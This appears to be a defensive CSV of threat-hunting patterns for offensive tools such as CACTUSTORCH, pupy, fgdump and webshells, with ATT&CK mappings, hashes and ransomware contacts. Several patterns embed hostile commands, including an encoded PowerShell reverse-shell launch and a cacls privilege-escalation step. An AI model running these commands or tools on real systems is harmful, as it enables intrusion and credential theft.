"*caadd01f003376a0d92f5bcc416a1702802c5c1072907644e29f39fb2c6c513c*",".{0,1000}caadd01f003376a0d92f5bcc416a1702802c5c1072907644e29f39fb2c6c513c.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","#filehash","N/A","10","","N/A","","","","37469" "*caadddddf63205db589f52d153f1abb0cb41c204115f0a8e7a1fcaf8530ffb0f*",".{0,1000}caadddddf63205db589f52d153f1abb0cb41c204115f0a8e7a1fcaf8530ffb0f.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37470" "*cabe4a6eb9bea5241230a45710a5df1ecf984be0cdf3e3e5fd9d130daf05864f*",".{0,1000}cabe4a6eb9bea5241230a45710a5df1ecf984be0cdf3e3e5fd9d130daf05864f.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","37476" "*cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBGAGkAbABlACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUwBoAGUAbABsADMAZQByAC4AcABzADEA*",".{0,1000}cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBGAGkAbABlACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUwBoAGUAbABsADMAZQByAC4AcABzADEA.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","0","#base64","N/A","9","10","61","14","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z","37478" "*cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBGAGkAbABlACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUwBoAGUAbABsADMAZQByAC4AcABzADEA*",".{0,1000}cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBGAGkAbABlACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUwBoAGUAbABsADMAZQByAC4AcABzADEA.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059.001 - T1021.004 - T1090.002","TA0002 - 
TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1","1","0","#base64","N/A","N/A","10","61","14","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z","37479" "*cac03f25496480d919c18f2eae0bcbe2f80444345bbea088c7b61eddd3c0c152*",".{0,1000}cac03f25496480d919c18f2eae0bcbe2f80444345bbea088c7b61eddd3c0c152.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37480" "*cacaf377019b13a2e03c1751bf05b0d1513c160ee5325dd54fdf541885846e58*",".{0,1000}cacaf377019b13a2e03c1751bf05b0d1513c160ee5325dd54fdf541885846e58.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37484" "*cacfd6b17986292835f2cfa05562c0565a923a246677fc6eed01d426ba74300e*",".{0,1000}cacfd6b17986292835f2cfa05562c0565a923a246677fc6eed01d426ba74300e.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","37487" "*cache_activedirectory.py*",".{0,1000}cache_activedirectory\.py.{0,1000}","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1087.002 - T1018 - T1482 - T1083","TA0007 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","5","5","465","54","2025-03-02T18:43:27Z","2018-10-22T18:21:44Z","37488" "*CacheDump service successfully installed*",".{0,1000}CacheDump\sservice\ssuccessfully\sinstalled.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential 
Access","https://github.com/ihamburglar/fgdump","1","0","#content","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","37489" "*cachedump.exe*",".{0,1000}cachedump\.exe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","37490" "*cachedump.py /*",".{0,1000}cachedump\.py\s\/.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","37491" "*cachedump64.exe*",".{0,1000}cachedump64\.exe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","37492" "*cacls C:\Windows\System32\wermgr.exe.local /e /g 
everyone:f*",".{0,1000}cacls\sC\:\\Windows\\System32\\wermgr\.exe\.local\s\/e\s\/g\severyone\:f.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","N/A","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","37493" "*cactus@mexicomail.com*",".{0,1000}cactus\@mexicomail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","37494" "*cactus787835@proton.me*",".{0,1000}cactus787835\@proton\.me.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","37495" "*cactusbloguuodvqjmnzlwetjlpj6aggc6iocwhuupb47laukux7ckid.onion*",".{0,1000}cactusbloguuodvqjmnzlwetjlpj6aggc6iocwhuupb47laukux7ckid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","37496" "*CACTUSTORCH.cna*",".{0,1000}CACTUSTORCH\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 
- T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","N/A","10","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","37497" "*CACTUSTORCH.cs*",".{0,1000}CACTUSTORCH\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","N/A","10","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","37498" "*CACTUSTORCH.hta*",".{0,1000}CACTUSTORCH\.hta.{0,1000}","offensive_tool_keyword","CACTUSTORCH","A JavaScript and VBScript shellcode launcher. 
This will spawn a 32 bit version of the binary specified and inject shellcode into it.","T1055.011 - T1059.005 - T1059.007","TA0002 - TA0005","N/A","APT32","Exploitation tool","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","N/A","8","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","37499" "*CACTUSTORCH.hta*",".{0,1000}CACTUSTORCH\.hta.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","N/A","10","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","37500" "*CACTUSTORCH.js*",".{0,1000}CACTUSTORCH\.js.{0,1000}","offensive_tool_keyword","CACTUSTORCH","A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it.","T1055.011 - T1059.005 - T1059.007","TA0002 - TA0005","N/A","APT32","Exploitation tool","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","N/A","8","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","37501" "*CACTUSTORCH.js*",".{0,1000}CACTUSTORCH\.js.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - 
TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","N/A","10","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","37502" "*CACTUSTORCH.vba*",".{0,1000}CACTUSTORCH\.vba.{0,1000}","offensive_tool_keyword","CACTUSTORCH","A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it.","T1055.011 - T1059.005 - T1059.007","TA0002 - TA0005","N/A","APT32","Exploitation tool","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","N/A","8","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","37503" "*CACTUSTORCH.vba*",".{0,1000}CACTUSTORCH\.vba.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - 
Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","N/A","10","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","37504" "*CACTUSTORCH.vbe*",".{0,1000}CACTUSTORCH\.vbe.{0,1000}","offensive_tool_keyword","CACTUSTORCH","A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it.","T1055.011 - T1059.005 - T1059.007","TA0002 - TA0005","N/A","APT32","Exploitation tool","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","N/A","8","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","37505" "*CACTUSTORCH.vbe*",".{0,1000}CACTUSTORCH\.vbe.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - 
Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","N/A","10","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","37506" "*CACTUSTORCH.vbs*",".{0,1000}CACTUSTORCH\.vbs.{0,1000}","offensive_tool_keyword","CACTUSTORCH","A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it.","T1055.011 - T1059.005 - T1059.007","TA0002 - TA0005","N/A","APT32","Exploitation tool","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","N/A","8","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","37507" "*CACTUSTORCH.vbs*",".{0,1000}CACTUSTORCH\.vbs.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","N/A","10","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","37508" "*cad7357cebb65176e5ea24ffa0ef75587ea700e50aa4bf0db182e673f458ed76*",".{0,1000}cad7357cebb65176e5ea24ffa0ef75587ea700e50aa4bf0db182e673f458ed76.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37510" "*cad75780597ec7bda1505580fb4585123eb9685e0b759082d739c037c11e67be*",".{0,1000}cad75780597ec7bda1505580fb4585123eb9685e0b759082d739c037c11e67be.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37511" "*cae47439ed3f0e93f2a67569bc8beaa43935db88e1e716abe014812c2c2b3725*",".{0,1000}cae47439ed3f0e93f2a67569bc8beaa43935db88e1e716abe014812c2c2b3725.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37513" "*cae4832509fdd3effd709ed3b7549d2472d9c11ad06121b295d03c6a4699b85c*",".{0,1000}cae4832509fdd3effd709ed3b7549d2472d9c11ad06121b295d03c6a4699b85c.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37514" "*cae8ce4abd220828370284f9cb4b66aeec57aa3d9fdd34a47599b10cead0beab*",".{0,1000}cae8ce4abd220828370284f9cb4b66aeec57aa3d9fdd34a47599b10cead0beab.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
